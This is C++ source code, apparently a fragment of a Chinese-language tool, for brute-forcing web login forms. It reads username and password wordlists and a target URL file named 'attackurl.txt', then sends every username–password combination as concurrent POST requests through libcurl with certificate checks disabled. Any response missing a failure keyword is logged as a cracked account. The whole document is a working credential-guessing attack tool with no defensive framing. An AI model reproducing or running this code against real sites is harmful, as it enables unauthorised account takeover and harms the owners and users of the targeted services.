SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
curl_global_init(CURL_GLOBAL_ALL);
SYSTEM_INFO info;
//根據CPU生成線程數
GetSystemInfo(&info);
vector<
string> user(istream_iterator<
string>(ifstream(userfilename.c_str())),istream_iterator<
string>());
vector<
string> pass(istream_iterator<
string>(ifstream(passwordfilename.c_str())),istream_iterator<
string>());
fstream filed(headerfilename);
while (!filed.eof())
{
char temp[4096]="";
filed.getline(temp,4096);
vecheader1.push_back(temp);
}
filed.close();
CWork::readpostdata(m_postdata);
CWork::readkeyword(keyword);
CWork::readurl(url);
vector<UserPass> obj_userpass;
for(size_t i=0;i!=user.size();i++)
{
for(size_t j=0;j!=pass.size();j++)
{
UserPass temp;
temp.user=user[i];
temp.pass=pass[j];
obj_userpass.push_back(temp);
}
}
string console_title;
CWork::maketitle(console_title,"帳號數量:",user.size());
CWork::maketitle(console_title,"密碼數量:",pass.size());
CWork::maketitle(console_title,"共計次數:",obj_userpass.size());
wstring w_console_title=CWork::s2ws(console_title);
SetConsoleTitle(w_console_title.c_str());
user.clear();
pass.clear();
////////////////////////生成測試數據////////////////////////
if(obj_userpass.size()>=1)
{
pull_one_url(obj_userpass[0]);
ofstream
out("第一次數據測試.txt",ios::app);
out<<sz_head<<endl<<endl;
out<<"--------分割性-----------"<<endl;
out<<sz_html<<endl;
out.close();
}
////////////////////////為了觀察一下關鍵字,到底應該設置什么////////////////////////
int thread_num=info.dwNumberOfProcessors*2;
long current_pos=1;
long result=0;
int num_total=obj_userpass.size();
console_title+="已發送:";
while (1)
{
if (obj_userpass.size()<current_pos)
{
break;
}
vector<UserPass> obj;
CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
stringstream strStream;
strStream<<result;
string new_tile=console_title;
new_tile+=strStream.str();
if (szCount!=0)
{
new_tile+=" 已成功破解:";
stringstream strStream1;
strStream1<<szCount;
new_tile+=strStream1.str();
}
wstring w_console_title=CWork::s2ws(new_tile);
SetConsoleTitle(w_console_title.c_str());
thread_group threads;
int obj_num=obj.size();
for (
int i = 0; i!=obj_num; ++ i) {
result++;
threads.create_thread(boost::bind(&pull_one_url,obj[i]));
}
threads.join_all();
}
cout<<"所有密碼全部查找完成"<<endl;
curl_global_cleanup();
void pull_one_url(UserPass obj)
{
bool m_true=
true;
transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower);
//所有html代碼,轉化為小寫
while(m_true)
{
string dddddd=m_postdata;
if(dddddd.empty())
{
cout<<"postdata中數據為空,線程馬上退出"<<endl;
return;
}
if (url.empty()||url=="")
{
cout<<"attackurl.txt不存在,或url地址為空"<<endl;
return;
}
CURL *curl = curl_easy_init();
string m_url=url;
string header;
string html;
struct curl_slist *slist_header = NULL;
for (
int i=0;i!=vecheader1.size();i++)
{
slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header);
//連接服務器和發送請求的超時設置,單位是毫秒
curl_easy_setopt(curl, CURLOPT_POST, 1);
//curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
if(m_url.substr(0,5)=="https")
{
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
}
curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000);
//curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);
CWork::replace(dddddd,"{0%}",obj.user.c_str());
CWork::replace(dddddd,"{1%}",obj.pass.c_str());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length());
// Content-Length:
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str());
//post提交的數據
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0");
curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);
curl_easy_perform(curl);
/* ignores error */ //curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num);//返回的html文件大小
long http_code=0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
//curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time);//總耗時
//curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time);//連接時間
//curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime);//dns查詢時間
//curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP);//ip地址
//CURLINFO_PRETRANSFER_TIME:從建立連接到準備傳輸所使用的時間;
//CURLINFO_STARTTRANSFER_TIME:從建立連接到傳輸開始所使用的時間;
//ptime now2 = microsec_clock::universal_time() + hours(8);
//boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
transform(header.begin(), header.end(), header.begin(), ::tolower);
//所有html代碼,轉化為小寫
transform(html.begin(), html.end(), html.begin(), ::tolower);
//所有html代碼,轉化為小寫
//在這里對html代碼進行轉碼,如果是utf8就轉gb2312
if(header.find("utf")!=-1)
{
string gb2312html;
CWork::Utf8ToGb2312(html.c_str(),gb2312html);
html=gb2312html;
}
if (http_code==200||http_code==302)
{
if (html.find(keyword)==-1)
{
szCount++;
boost::mutex::scoped_lock
lock(io_mutex);
ofstream
out(result,ios::app);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
out<<"恭喜!!! 用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
cout<<"http狀態"<<http_code<<"密碼破解成功1個 username:"<<obj.user<<" password:"<<obj.pass<<endl;
out.close();
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}
else {
boost::mutex::scoped_lock
lock(io_mutex);
cout<<"密碼錯誤"<<" 線程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
}
}
else {
if(http_code==0)
{
boost::mutex::scoped_lock
lock(io_mutex);
cout<<"超時馬上重新連接"<<"用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
curl_easy_cleanup(curl);
continue;
}
boost::mutex::scoped_lock
lock(io_mutex);
cout<<"密碼錯誤"<<" 線程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
}
m_true=
false;
curl_easy_cleanup(curl);
sz_html=html;
sz_head=header;
}
}
